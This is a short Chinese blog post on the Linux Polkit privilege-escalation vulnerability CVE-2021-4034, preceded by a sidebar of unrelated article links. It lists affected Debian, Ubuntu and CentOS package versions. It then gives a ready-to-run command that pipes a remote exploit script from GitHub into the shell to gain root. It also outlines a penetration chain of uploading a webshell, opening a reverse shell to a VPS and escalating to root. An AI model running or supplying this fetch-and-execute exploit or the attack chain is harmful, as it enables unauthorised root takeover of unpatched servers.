- 1Maven 3 各版本 下载方法_maven下载
- 2多元二项式回归(matlab)_matlab二阶多项式回归
- 3Java [ 基础 ] HashMap详解 ✨_java hashmap
- 4Go语言开发网站_go语言网站开发
- 5SpringBoot集成权限认证框架(Sa-Token)_springboot sa-token
- 6【uniapp】微信小程序2024手机号快速验证及无感登录教程(内附代码)_手机号快速验证组件
- 7基于神经网络的大模型在自然语言处理中的应用前景展望
- 8【数据结构与算法】单链表的排序算法(选择,冒泡,递归)_单链表排序
- 9【翻译】 DMA和get_user_pages()
- 10最长递增子序列(LIS)的三种算法_最长递增子序列算法
Linux Polkit 权限提升漏洞(CVE-2021-4034)_linux policykit1
赞
踩
Linux Polkit 权限提升漏洞(CVE-2021-4034)
影响范围
Debain stretch policykit-1 < 0.105-18+deb9u2
Debain buster policykit-1 < 0.105-25+deb10u1
Debain bookworm, bullseye policykit-1 < 0.105-31.1
Ubuntu 21.10 (Impish Indri) policykit-1 < 0.105-31ubuntu0.1
Ubuntu 21.04 (Hirsute Hippo) policykit-1 Ignored (reached end-of-life)
Ubuntu 20.04 LTS (Focal Fossa) policykit-1 < 0.105-26ubuntu1.2)
Ubuntu 18.04 LTS (Bionic Beaver) policykit-1 < 0.105-20ubuntu0.18.04.6)
Ubuntu 16.04 ESM (Xenial Xerus) policykit-1 < 0.105-14.1ubuntu0.5+esm1)
Ubuntu 14.04 ESM (Trusty Tahr) policykit-1 < 0.105-4ubuntu3.14.04.6+esm1)
CentOS 6 polkit < polkit-0.96-11.el6_10.2
CentOS 7 polkit < polkit-0.112-26.el7_9.1
CentOS 8.0 polkit < polkit-0.115-13.el8_5.1
CentOS 8.2 polkit < polkit-0.115-11.el8_2.2
CentOS 8.4 polkit < polkit-0.115-11.el8_4.2
漏洞利用详情
直接运行
sh -c "$(curl -sSL https://github.com/dzonerzy/poc-cve-2021-4034/releases/download/v0.2/run-exploit.sh)"
- 1
即可获取root权限
CVE-2021-4034在渗透实战中的利用
通过上传webshell,拿到服务器权限,进行命令执行反弹shell到vps上,在执行命令即可拿到root权限
